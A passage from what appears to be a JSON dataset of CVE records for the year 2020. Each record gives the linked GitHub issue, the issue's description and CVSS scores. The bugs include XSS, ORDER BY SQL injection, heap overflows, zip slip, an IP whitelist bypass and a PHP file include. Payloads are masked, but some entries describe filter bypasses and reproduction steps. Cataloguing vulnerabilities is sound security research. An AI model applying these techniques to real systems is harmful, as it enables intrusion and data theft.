  46869. "Issue_Url_old": "https://github.com/istio/istio/issues/13589",
  46870. "Issue_Url_new": "https://github.com/istio/istio/issues/13589",
  46871. "Repo_new": "istio/istio",
  46872. "Issue_Created_At": "2019-04-24T17:12:32Z",
  46873. "description": "Istio does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Bug description Istio does not properly send a NUMBERTAG response when a connection is reused and accident sent to a server that is not the correct origin. This can occur when there are two gateways, one with a wildcard certificate ( . APITAG and one with a different non wildcard certificate (b. APITAG routing to two different apps (a.example.com and b. APITAG where a http NUMBERTAG connection is first established to the wildcard gateway (on host a.example.com with . APITAG then a resource is requested from an application on the non wildcard gateway (b.example.com with certificate b. APITAG Because of http NUMBERTAG connection reuse it's possible for traffic destined for the second app (b. APITAG to end up being routed on the existing connection for (a. APITAG due to the RFC definition of connection re use in section NUMBERTAG FILETAG e.g., because the certificate can authoritatively handle the request, and the IP address is the same as they are on the same ingressgateway). When that happens, according to section NUMBERTAG istio should respond with a NUMBERTAG indicating that the wrong connection was used and the origin was not found. This would instruct the browser to retry on a new connection, thus renegotiating TLS and presenting SNI and thus going down the non wildcard certificate route and to a different gateway/virtual service and the correct service. Expected behavior Instead of returning a NUMBERTAG as section NUMBERTAG indicates in RFC NUMBERTAG istio returns a ERRORTAG . Steps to reproduce the bug NUMBERTAG Create istio NUMBERTAG instance with one ingress gateway NUMBERTAG Create a DNS record a. APITAG and b.example.com both point to the ingress gateway NUMBERTAG Create a gateway named \"a\" for a.example.com that uses .example.com server host, and has a wildcard certificate for . APITAG NUMBERTAG Create a gateway named \"b\" for b.example.com that uses b.example.com server host and has a specific certificate b. APITAG NUMBERTAG Create an app that hosts a static website with two files FILETAG and FILETAG . The FILETAG file should have an image tag that refers to an image FILETAG (e.g., APITAG NUMBERTAG Deploy the app twice to Kubernetes and attach virtual services for a.example.com to go to the app and b.example.com to go to the app (effectively a.example.com and b.example.com are both hosting the app with different certificates on the same IP address, where a is on a wildcard cert and b is not NUMBERTAG isit URLTAG notice that you receive a ERRORTAG in Chrome and Firefox but not safari or opera. Version (include the output of APITAG and kubectl version ) CODETAG How was Istio installed? Helm Environment where bug was observed (cloud vendor, OS, etc) AWS, with istio installed and running with an NLB ingress or as a nodeport terminating the TLS.",
  46874. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
  46875. "severity": "LOW",
  46876. "baseScore": 3.1,
  46877. "impactScore": 1.4,
  46878. "exploitabilityScore": 1.6
  46879. },
  46880. {
  46881. "CVE_ID": "CVE-2020-11767",
  46882. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6767",
  46883. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6767",
  46884. "Repo_new": "envoyproxy/envoy",
  46885. "Issue_Created_At": "2019-05-01T14:21:34Z",
  46886. "description": "Envoy does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Title : Envoy does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Description : >RFC NUMBERTAG Section NUMBERTAG and NUMBERTAG specifies when a request coming in through a re used HTTP NUMBERTAG connection is accidentally sent to a non origin but authoritative server that a NUMBERTAG response should be returned. This can happen if two servers one with a wildcard certificate (e.g., a. APITAG and another server (b. APITAG with a non wildcard on the same IP address using SNI responds to requests those meant for server b.example.com will accidentally be forwarded down the re used HTTP NUMBERTAG connection for a. APITAG In this situation a.example.com should send back a NUMBERTAG to indicate the request was destined for b. APITAG This forces browsers to re establish a new connection, re negotiate the SNI, and thus the backing server and subsequently route to the correct origin. [optional Relevant Links :] FILETAG section describing connection re use FILETAG section describing misdirected response CVETAG The bug was originally filed against Chromium however they indicated Istio was the issue. URLTAG The bug was then filed against istio who indicated envoy was the issue.",
  46887. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
  46888. "severity": "LOW",
  46889. "baseScore": 3.1,
  46890. "impactScore": 1.4,
  46891. "exploitabilityScore": 1.6
  46892. },
  46893. {
  46894. "CVE_ID": "CVE-2020-11872",
  46895. "Issue_Url_old": "https://github.com/opentrace-community/opentrace-cloud-functions/issues/7",
  46896. "Issue_Url_new": "https://github.com/opentrace-community/opentrace-cloud-functions/issues/7",
  46897. "Repo_new": "opentrace-community/opentrace-cloud-functions",
  46898. "Issue_Created_At": "2020-04-13T09:37:43Z",
  46899. "description": "Incorrect IV Initialisation for AES NUMBERTAG GCM and Constraints on the Number of Invocations. The current implementation does not follow NIST Special Publication NUMBERTAG D, in particular Section NUMBERTAG IV Constructions and NUMBERTAG Constraints on the Number of Invocations regarding the secret key. To mitigate NUMBERTAG IVs can be converted to deterministic construction per NUMBERTAG To mitigate NUMBERTAG Temporary IDs should use an ephemeral key derived from the secret key and uid values, so that the same key is not used for more than NUMBERTAG operations. The current implementation may permit an adversary to fabricate IDs or Upload Tokens, if they collect duplicated IVs or more than NUMBERTAG encryption operations are performed against the same key.",
  46900. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46901. "severity": "HIGH",
  46902. "baseScore": 7.5,
  46903. "impactScore": 3.6,
  46904. "exploitabilityScore": 3.9
  46905. },
  46906. {
  46907. "CVE_ID": "CVE-2020-11887",
  46908. "Issue_Url_old": "https://github.com/domenic/svg2png/issues/117",
  46909. "Issue_Url_new": "https://github.com/domenic/svg2png/issues/117",
  46910. "Repo_new": "domenic/svg2png",
  46911. "Issue_Created_At": "2020-04-17T02:35:29Z",
  46912. "description": "SSRF and Server Side XSS. this package uses phantomjs to render a xml snippet to image\uff0cthus the xml can be any html ,script. As the render process runs at backend,so there aressrf and server side xss risks.",
  46913. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46914. "severity": "MEDIUM",
  46915. "baseScore": 6.1,
  46916. "impactScore": 2.7,
  46917. "exploitabilityScore": 2.8
  46918. },
  46919. {
  46920. "CVE_ID": "CVE-2020-11888",
  46921. "Issue_Url_old": "https://github.com/trentm/python-markdown2/issues/348",
  46922. "Issue_Url_new": "https://github.com/trentm/python-markdown2/issues/348",
  46923. "Repo_new": "trentm/python-markdown2",
  46924. "Issue_Created_At": "2020-04-13T00:38:25Z",
  46925. "description": "Another Filter bypass leading to XSS. On the latest release NUMBERTAG a payload like this one can lead to xss and bypass safe_mode when set to true. APITAG The Problem: I think its due to just bad regex's not detecting non alphanumeric tags. FILETAG",
  46926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46927. "severity": "MEDIUM",
  46928. "baseScore": 6.1,
  46929. "impactScore": 2.7,
  46930. "exploitabilityScore": 2.8
  46931. },
  46932. {
  46933. "CVE_ID": "CVE-2020-11894",
  46934. "Issue_Url_old": "https://github.com/libming/libming/issues/196",
  46935. "Issue_Url_new": "https://github.com/libming/libming/issues/196",
  46936. "Repo_new": "libming/libming",
  46937. "Issue_Created_At": "2020-04-17T02:47:07Z",
  46938. "description": "heap overflow in APITAG APITAG ./swftocxx $poc FILETAG ERRORTAG",
  46939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  46940. "severity": "CRITICAL",
  46941. "baseScore": 9.1,
  46942. "impactScore": 5.2,
  46943. "exploitabilityScore": 3.9
  46944. },
  46945. {
  46946. "CVE_ID": "CVE-2020-11895",
  46947. "Issue_Url_old": "https://github.com/libming/libming/issues/197",
  46948. "Issue_Url_new": "https://github.com/libming/libming/issues/197",
  46949. "Repo_new": "libming/libming",
  46950. "Issue_Created_At": "2020-04-17T02:50:13Z",
  46951. "description": "heap overflow in APITAG APITAG ./swftocxx $poc FILETAG ERRORTAG",
  46952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  46953. "severity": "CRITICAL",
  46954. "baseScore": 9.1,
  46955. "impactScore": 5.2,
  46956. "exploitabilityScore": 3.9
  46957. },
  46958. {
  46959. "CVE_ID": "CVE-2020-11944",
  46960. "Issue_Url_old": "https://github.com/bitcoin-abe/bitcoin-abe/issues/292",
  46961. "Issue_Url_new": "https://github.com/bitcoin-abe/bitcoin-abe/issues/292",
  46962. "Repo_new": "bitcoin-abe/bitcoin-abe",
  46963. "Issue_Created_At": "2020-04-20T21:24:43Z",
  46964. "description": "Page Not Found Handler Cross site Scripting CVETAG . A lack of filtering around line NUMBERTAG of abe.py ERRORTAG allows attackers to abuse the Page Not Found error handler and pass rogue APITAG to unsuspecting users using a specially crafted URL: ERRORTAG MITRE has assigned CVETAG URLTAG to this flaw. Thank you.",
  46965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46966. "severity": "MEDIUM",
  46967. "baseScore": 6.1,
  46968. "impactScore": 2.7,
  46969. "exploitabilityScore": 2.8
  46970. },
  46971. {
  46972. "CVE_ID": "CVE-2020-12071",
  46973. "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/1333",
  46974. "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/1333",
  46975. "Repo_new": "anchorcms/anchor-cms",
  46976. "Issue_Created_At": "2020-04-22T19:08:17Z",
  46977. "description": "Stored Cross Site Scripting Exists in post content.. Summary A user is able to inject APITAG into a post via the post creation feature. Expected Behaviour The CMS should HTML encode any inputted data so it is reflected back safely to the user. Actual Behaviour The CMS reflects back the post content without HTML encoding, meaning the client browser renders it as valid HTML / JS on the main page, and on that posts page. This can lead to malicious javascript being executed on anyone who visits the site's browser. Context details (if applicable) Anchor version NUMBERTAG Server setup: Ubuntu running apache2 and PHP NUMBERTAG Reproduction NUMBERTAG Login to admin panel NUMBERTAG Create a blog post where the post title can be anything, and post content is an XSS payload, in my case, I used APITAG NUMBERTAG Go to the main page to trigger the payload, alternatively, go to the blog post created in the previous step, this too shall trigger the payload. FILETAG As we can see in the blog post source, the title and category are both HTML encoded before being reflected back to the user, although, the post content is not, and our browser renders our JS as valid code. FILETAG",
  46978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  46979. "severity": "MEDIUM",
  46980. "baseScore": 4.8,
  46981. "impactScore": 2.7,
  46982. "exploitabilityScore": 1.7
  46983. },
  46984. {
  46985. "CVE_ID": "CVE-2020-12079",
  46986. "Issue_Url_old": "https://github.com/beakerbrowser/beaker/issues/1519",
  46987. "Issue_Url_new": "https://github.com/beakerbrowser/beaker/issues/1519",
  46988. "Repo_new": "beakerbrowser/beaker",
  46989. "Issue_Created_At": "2020-03-10T08:47:37Z",
  46990. "description": "Security issue report. hello, I've find a critical vulnerability inside beaker browser, and have sent you details of this vulnerability by sending email to MENTIONTAG . Please check it and feel free to contact me.",
  46991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  46992. "severity": "CRITICAL",
  46993. "baseScore": 10.0,
  46994. "impactScore": 6.0,
  46995. "exploitabilityScore": 3.9
  46996. },
  46997. {
  46998. "CVE_ID": "CVE-2020-12102",
  46999. "Issue_Url_old": "https://github.com/prasathmani/tinyfilemanager/issues/357",
  47000. "Issue_Url_new": "https://github.com/prasathmani/tinyfilemanager/issues/357",
  47001. "Repo_new": "prasathmani/tinyfilemanager",
  47002. "Issue_Created_At": "2020-05-11T04:33:34Z",
  47003. "description": "security breaches in tiny file manager. hi, are you aware of this? URLTAG see also other mentions: URLTAG",
  47004. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
  47005. "severity": "HIGH",
  47006. "baseScore": 7.7,
  47007. "impactScore": 4.0,
  47008. "exploitabilityScore": 3.1
  47009. },
  47010. {
  47011. "CVE_ID": "CVE-2020-12265",
  47012. "Issue_Url_old": "https://github.com/kevva/decompress/issues/71",
  47013. "Issue_Url_new": "https://github.com/kevva/decompress/issues/71",
  47014. "Repo_new": "kevva/decompress",
  47015. "Issue_Created_At": "2019-10-04T07:09:44Z",
  47016. "description": "Vulnerable to zip slip. It appears as decompress is vulnerable to archives containing files that hold path traversal names such as APITAG . As a APITAG I have attached a .tar archive that will, when extracted, create a file in APITAG . Use the example code to extract: APITAG Note that this will not work out of the box with .zip archives since yauzl will throw an exception if the entry's filename contains \" APITAG \".",
  47017. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47018. "severity": "CRITICAL",
  47019. "baseScore": 9.8,
  47020. "impactScore": 5.9,
  47021. "exploitabilityScore": 3.9
  47022. },
  47023. {
  47024. "CVE_ID": "CVE-2020-12286",
  47025. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6333",
  47026. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6333",
  47027. "Repo_new": "octopusdeploy/issues",
  47028. "Issue_Created_At": "2020-04-28T03:53:17Z",
  47029. "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA Relevant Pull Request(s) URLTAG Relevant Private Isssue(s) URLTAG",
  47030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47031. "severity": "MEDIUM",
  47032. "baseScore": 4.3,
  47033. "impactScore": 1.4,
  47034. "exploitabilityScore": 2.8
  47035. },
  47036. {
  47037. "CVE_ID": "CVE-2020-12286",
  47038. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6331",
  47039. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6331",
  47040. "Repo_new": "octopusdeploy/issues",
  47041. "Issue_Created_At": "2020-04-28T03:36:15Z",
  47042. "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA",
  47043. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47044. "severity": "MEDIUM",
  47045. "baseScore": 4.3,
  47046. "impactScore": 1.4,
  47047. "exploitabilityScore": 2.8
  47048. },
  47049. {
  47050. "CVE_ID": "CVE-2020-12286",
  47051. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6332",
  47052. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6332",
  47053. "Repo_new": "octopusdeploy/issues",
  47054. "Issue_Created_At": "2020-04-28T03:44:10Z",
  47055. "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA Relevant Pull Request(s) URLTAG Relevant Private Isssue(s) URLTAG",
  47056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47057. "severity": "MEDIUM",
  47058. "baseScore": 4.3,
  47059. "impactScore": 1.4,
  47060. "exploitabilityScore": 2.8
  47061. },
  47062. {
  47063. "CVE_ID": "CVE-2020-12438",
  47064. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2307",
  47065. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2307",
  47066. "Repo_new": "php-fusion/PHP-Fusion",
  47067. "Issue_Created_At": "2020-04-27T14:46:08Z",
  47068. "description": "Cross Site Scripting Vulnerability on \"banner\" feature in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a stored XSS vulnerability in the \"banner\" feature. This was previously patched to remove any \" APITAG \" tags in the banner, although this can be bypassed by using HTML event handlers, such as \"onerror\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click edit on banner one, or add a new banner NUMBERTAG Insert payload \" APITAG APITAG NUMBERTAG iew the page to trigger XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version of Browser NUMBERTAG",
  47069. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47070. "severity": "MEDIUM",
  47071. "baseScore": 5.4,
  47072. "impactScore": 2.7,
  47073. "exploitabilityScore": 2.3
  47074. },
  47075. {
  47076. "CVE_ID": "CVE-2020-12439",
  47077. "Issue_Url_old": "https://github.com/mimblewimble/grin/issues/3235",
  47078. "Issue_Url_new": "https://github.com/mimblewimble/grin/issues/3235",
  47079. "Repo_new": "mimblewimble/grin",
  47080. "Issue_Created_At": "2020-02-20T15:50:04Z",
  47081. "description": "Rework output_pos index (better txhashset transactional support). Recent exploration into the implementation of an index of \"recently seen\" kernels led us down the path of maintaining an \"undo\" list per block. This way we can robustly handle duplicate kernels, maintaining the pos of the most recent instance of the kernel in the index, while being able to handle rewind scenarios involving previous instances of the kernel. Related URLTAG We do something similar to this for the APITAG index currently where we track a bitmap of spent output pos per block. And during rewind we use this per block bitmap to ensure the UTXO set is consistent with rewound chain state. Note that this allows the utxo set to be rewound reliably but leaves \"false positives\" in the APITAG index as we do not rewind the index itself. So we have always used the APITAG index as non authoritative. During rewind we can (and will expect to) encounter \"false positive\" results from the index. We may find an entry in the index for a given output, but we do not yet know for sure if this index entry is accurate. So we go to the PMMR itself for authoritative view of chain state. The process is roughly look in output_pos for possible result if nothing in index then output is spent if we find a result in the index, look in the output PMMR compare output commitment between index and PMMR if match then output is unspent otherwise output is spent It became apparent during the kernel index exploration that there is a better way to do this that can also be applied to the APITAG index. Rather than storing a bitmap of spent output positions which is by definition unsorted, we can store a vec of output positions where the sort order is consistent with the inputs to the block. This provides the ability to map positions to input commitments themselves. Rewind can now take advantage of this to ensure the output_pos index remains consistent with the rewound chain state. The APITAG index can be maintained transactionally alongside block processing, in both regular (apply new block) and rewound directions. This eliminates the possibility for \"false positives\" in the index lookup. If we find an entry in the index then we know the output is unspent. If we do not find an entry, the output is spent, or never existed. This involves a change to what we store in the db. We need to store a vec of output_pos (and associated block heights) rather than the existing serialized bitmap per block. This also involves changes to both APITAG and the APITAG impls to update the APITAG as necessary, within the txhashset extension (and therefore transactionally). Reworking the APITAG index to handle transactional rewind in this way gives us a clear path forward to use the same approach for the APITAG index. Rather than \"spending\" outputs we replace kernels with more recent instances (in the \"recently seen\" index). We have this working on a branch. PR coming shortly for these changes. Ideally we can get this into APITAG and allow it to be sufficiently tested and released as part of APITAG . Tracking this here so we can tag it as scheduled for inclusion in APITAG .",
  47082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  47083. "severity": "MEDIUM",
  47084. "baseScore": 5.3,
  47085. "impactScore": 1.4,
  47086. "exploitabilityScore": 3.9
  47087. },
  47088. {
  47089. "CVE_ID": "CVE-2020-12458",
  47090. "Issue_Url_old": "https://github.com/grafana/grafana/issues/8283",
  47091. "Issue_Url_new": "https://github.com/grafana/grafana/issues/8283",
  47092. "Repo_new": "grafana/grafana",
  47093. "Issue_Created_At": "2017-05-03T16:54:15Z",
  47094. "description": "APITAG Wrong permissions in grafana package for grafana.db. It looks like in URLTAG there were plans to lock down the sqlite DB to NUMBERTAG While grafana.ini did get locked down, the DB did not. Unless this is no longer believed to be necessary I could try to send a PR. What Grafana version are you using NUMBERTAG What datasource are you using? APITAG What OS are you running grafana on? APITAG NUMBERTAG What did you do? Logged into grafana.db as a regular user What was the expected result? Permission denied What happened instead? Logged in without issue, able to query salt and password for users CODETAG",
  47095. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  47096. "severity": "MEDIUM",
  47097. "baseScore": 5.5,
  47098. "impactScore": 3.6,
  47099. "exploitabilityScore": 1.8
  47100. },
  47101. {
  47102. "CVE_ID": "CVE-2020-12460",
  47103. "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDMARC/issues/64",
  47104. "Issue_Url_new": "https://github.com/trusteddomainproject/opendmarc/issues/64",
  47105. "Repo_new": "trusteddomainproject/opendmarc",
  47106. "Issue_Created_At": "2020-07-25T10:48:50Z",
  47107. "description": "Memory corruption in APITAG There is a memory corruption vulnerability in APITAG of libopendmarc during parsing of DMARC aggregate reports. The root cause is improper null termination. The function APITAG does not explicitly add a null terminator NUMBERTAG to the buffer holding the XML data after reading the contents from a report file. This can cause an off by one error in APITAG in certain cases depending on the report file, resulting in a one byte heap overflow. A null byte write occurs during the parsing at APITAG APITAG . Eventually, during parsing of a specially crafted report, this null byte will overflow to the next chunk on the heap, overwriting the heap metadata, as indicated by the following valgrind output. CODETAG The size field and the least significant bits used as flags are overwritten in the metadata. The relevant flag for this vulnerability is the bit indicating 'previous chunk in use', known as PREV_INUSE which will be set to zero and determines if the previous chunk (storing bufp) is free. When the buffer is later free'd at APITAG APITAG a crash occurs as bufp is listed as not used. ERRORTAG A remote attacker could provide a specially crafted report that is parsed by this library, causing a denial of service. It could possibly lead to code execution depending on how libopendmarc is used and integrated into the application and in particular if the opendmarc_xml function is used explicitly without calling opendmarc_xml_parse and with input that is not null terminated. A DMARC aggregate report that triggers this vulnerability can be generated using the following commands: APITAG",
  47108. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47109. "severity": "CRITICAL",
  47110. "baseScore": 9.8,
  47111. "impactScore": 5.9,
  47112. "exploitabilityScore": 3.9
  47113. },
  47114. {
  47115. "CVE_ID": "CVE-2020-12461",
  47116. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2308",
  47117. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2308",
  47118. "Repo_new": "php-fusion/PHP-Fusion",
  47119. "Issue_Created_At": "2020-04-28T18:43:09Z",
  47120. "description": "Authenticated SQL Injection Exists in any page that allows control over the sort order.. Describe the bug A SQLi exists in any page that allows control over the order of the response from the SQL query ran on the database, as far as I can tell. I have verified the existence of the SQLi by monitoring the APITAG logs, and noticing I have control over anything after the \"ORDERY BY\" parameter. Although people thing this clause is not exploitable, it actually is, fairly simply, as I demonstrated here: URLTAG I am happy to send an example payload that allows for data exfiltration in private, although I think until this is patched, a working payload should not be made public. To Reproduce Steps to reproduce the behavior NUMBERTAG Login on the app NUMBERTAG Go to the \"search for members\" feature NUMBERTAG Change the order by parameter and click search NUMBERTAG Notice the URL now contains additional GET parameters, one of which is \"sort_order NUMBERTAG Strip target URL of unnecessary parts, leaving something like: APITAG NUMBERTAG Insert ORDER BY SQLi payload into sort_order parameter NUMBERTAG Depending on database output, and order, you can judge what the output of the binary query was, and exfiltrate data. Expected behavior Only allow the selection of \"ASC\" or \"DESC\" (non case sensitive), this is all you need for the desired functionality. __WARNING, DO NOT JUST BLOCK WHITESPACES, EXPLICITLY MATCH ASC OR DESC__. Screenshots FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG Additional context This was tested on the latest version, more information available upon request. For clarity, if the query failed, the APITAG Logs would not have my modification in it. This can be modified to a variety of things, as long as it is valid SQL syntax.",
  47121. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  47122. "severity": "HIGH",
  47123. "baseScore": 8.8,
  47124. "impactScore": 5.9,
  47125. "exploitabilityScore": 2.8
  47126. },
  47127. {
  47128. "CVE_ID": "CVE-2020-12477",
  47129. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2761",
  47130. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2761",
  47131. "Repo_new": "nilsteampassnet/teampass",
  47132. "Issue_Created_At": "2020-04-02T16:10:04Z",
  47133. "description": "IP whitelist bypass. Teampass includes a feature to restrict the source IP address users can use to interact with Teampass. The value of the source IP address is defined from the first value in the X Forwarded For header in the client request. Due to the fact that the client controls the X Forwarded For header and can set it to any value of their choosing, this header can be set to a whitelisted value which allows any client that can guess a whitelisted IP address to interact with Teampass from wherever they like. Steps to reproduce NUMBERTAG Add NUMBERTAG to the list of API IP Addresses allowed NUMBERTAG Make an API call with an appropriate X Forwarded For header and notice that the call is valid APITAG Steps to fix No data in headers provided by the client can be trusted, including X Forwarded For. The only reliable data about a client IP address is in the Source Address field in a TCP packet ( FILETAG . Server configuration Teampass version NUMBERTAG",
  47134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47135. "severity": "HIGH",
  47136. "baseScore": 7.5,
  47137. "impactScore": 3.6,
  47138. "exploitabilityScore": 3.9
  47139. },
  47140. {
  47141. "CVE_ID": "CVE-2020-12478",
  47142. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2764",
  47143. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2764",
  47144. "Repo_new": "nilsteampassnet/teampass",
  47145. "Issue_Created_At": "2020-04-02T16:18:48Z",
  47146. "description": "Some Teampass files are available without authentication. Many of the files included in Teampass are available without authentication to anyone who can interact with the web server. While this may not be an issue for some of the images or Javascript files, it is an issue for the user uploaded files that are available without authentication. These include: upload dir all file uploads (encrypted) avatars dir all profile pictures backups dir (presumably) Teampass backups Note that accessing the scripts here can also trigger the backups to run files dir PDFs generated via admin functions are saved here many files under the \u201cincludes\u201d directory miscellaneous files under web root FILETAG , APITAG Dockerfile, etc) Additionally, it does not appear that Teampass checks to see if directory listing is turned on on the web server. This feature is frequently on by default and when left on, makes it easy to discover the hashed file names that are sometimes used. Steps to reproduce Use a simple curl request to retrieve one of the files I noted above. EG: APITAG Steps to fix Review what files and directories should be exposed without authentication Ensure that only authenticated users can attempt to access files in sensitive directories (upload, backups, files, etc) Ensure that only authorized users can actually retrieve files in sensitive directories Server configuration Teampass version NUMBERTAG",
  47147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47148. "severity": "HIGH",
  47149. "baseScore": 7.5,
  47150. "impactScore": 3.6,
  47151. "exploitabilityScore": 3.9
  47152. },
  47153. {
  47154. "CVE_ID": "CVE-2020-12479",
  47155. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2762",
  47156. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2762",
  47157. "Repo_new": "nilsteampassnet/teampass",
  47158. "Issue_Created_At": "2020-04-02T16:12:17Z",
  47159. "description": "PHP arbitrary file include. Teampass allows users to choose from several different languages. The user changes their language preference by sending a POST request to Teampass ( APITAG ) that contains the string of the language they choose (\u201cenglish\u201d, \u201cspanish\u201d, etc). This string provided by the user is not validated or sanitized in any way. After the string provided by the user is stored in the DB, it is eventually used in APITAG during login on line NUMBERTAG APITAG This allows any user to file_include any existing PHP file on disk. If a user could upload their own PHP file, then it could be combined with this bug to achieve code execution on the Teampass server. Steps to fix Validate the value from the APITAG parameter. The only permissible values should be a hard coded list of strings that exist in PATHTAG directory. In the case of a non valid value, Teampass should deny the language change and immediately stop processing the data in the APITAG parameter Server configuration Teampass version NUMBERTAG",
  47160. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  47161. "severity": "HIGH",
  47162. "baseScore": 8.8,
  47163. "impactScore": 5.9,
  47164. "exploitabilityScore": 2.8
  47165. },
  47166. {
  47167. "CVE_ID": "CVE-2020-12607",
  47168. "Issue_Url_old": "https://github.com/AntonKueltz/fastecdsa/issues/52",
  47169. "Issue_Url_new": "https://github.com/antonkueltz/fastecdsa/issues/52",
  47170. "Repo_new": "antonkueltz/fastecdsa",
  47171. "Issue_Created_At": "2020-04-13T15:05:16Z",
  47172. "description": "ECDSA verification fails for extreme value in k and s NUMBERTAG P NUMBERTAG SHA NUMBERTAG Hello, When verifying a ECDSA signature (P NUMBERTAG SHA NUMBERTAG with a extreme value in k and s NUMBERTAG the verification fails even if the signature is correct. It is possible to check this using the Google Wycheproof test NUMBERTAG URLTAG ERRORTAG I've added a APITAG using fast ecdsa and python cryptography (below). ERRORTAG Best regards, Antonio",
  47173. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47174. "severity": "HIGH",
  47175. "baseScore": 7.5,
  47176. "impactScore": 3.6,
  47177. "exploitabilityScore": 3.9
  47178. },
  47179. {
